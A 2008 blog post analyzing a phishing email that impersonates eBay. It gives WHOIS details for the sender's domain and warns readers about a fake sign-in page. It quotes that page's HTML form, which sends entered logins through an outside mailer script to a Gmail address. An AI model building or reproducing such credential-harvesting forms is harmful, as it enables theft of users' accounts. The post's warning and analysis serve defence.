Matthew Trevino's Scarform
this.isn't.it.

Ebay scams

Recently I received an email from an Ebay member named Wolffmart. I hadn’t used Ebay in months, so I immediately knew something was strange when it said that he had a question for me regarding a purchase. The message was to Thecomputerguy8002 (whether or not that is a real Ebay user-id is beyond me.) However, I decided to look a little deeper into the email itself.

The email originated ebay@wolffmart.com. (Visiting Wolffmart.com will merely give you a large Coming soon! and nothing else.) The originating email address is easily forged, and usually is, however since this domain shares the same web host as my own, I’ve decided to post the information as a precaution.

Domain Name: WOLFFMART.COM
Registrar: NEW DREAM NETWORK, LLC
Whois Server: whois.dreamhost.com
Referral URL: http://www.dreamhost.com
Name Server: NS1.DREAMHOST.COM
Name Server: NS2.DREAMHOST.COM
Name Server: NS3.DREAMHOST.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 21-feb-2005
Expiration Date: 21-feb-2009

The email itself contained an image with the text (a response to a question about a T-mobile Sidekick) and the image linked to yet another domain (simon171.com (link).) DO NOT input your Ebay information on the page that I have linked. It is a fictitious sign-in page. The code below illustrates where the information that is input is sent and the location of the script it uses to send the information. (If you look further down at the code, once the information is input and sent, it redirects to the real Ebay page.) I’ve bolded both the email address this information is sent to as well as the location of the script being used.

<FORM METHOD=”POST” ACTION=”http://www.datacomm.ch/cgi/mailer.pl“>
<input name=”recipients” type=”hidden” id=”recipients” value=”xxx12345xxx82@gmail.com“>

I’ve seen some attempts at getting Ebay information before, but none as this transparent. I’ve already contacted the owner of Simon171.com and will soon forward this to Ebay, Gmail and Dreamhost.

Important notes:

  1. ALWAYS check the url of the website to make sure that you are entering your information on a page that is legit.
  2. For things like Ebay, Paypal, etc., if doesn’t have Paypal.com, Ebay.com (etc) in the domain name, DO NOT put your information in.
  3. Always be aware of the Lock at the bottom right hand portion of the screen. You will be able to see a certificate for the corresponding webpage if it is the correct one.



required



required - won't be displayed


Your Comment:

Posted: February 17th 2008
Category: WWW
Tags:

Offering a complete solution for merchants to sell online through the use of ecommerce software, Ashop Commerce uses a web-based application which utilizes thousands of features and a fully customizable design. This shopping cart software is an affordable viable option for merchants who would like to sell their merchandise online and have a wider reach [...]

Previous Entry

Pulaski.—The county ranked sixth in total value of mineral output. Increased production of stone, sand and gravel, and clays was sufficient to offset a significant drop in bauxite production; total mineral value was more than $1 million higher than that of 1962. The county ranked first in the State in value of stone and clay [...]

Next Entry

Archives
Categories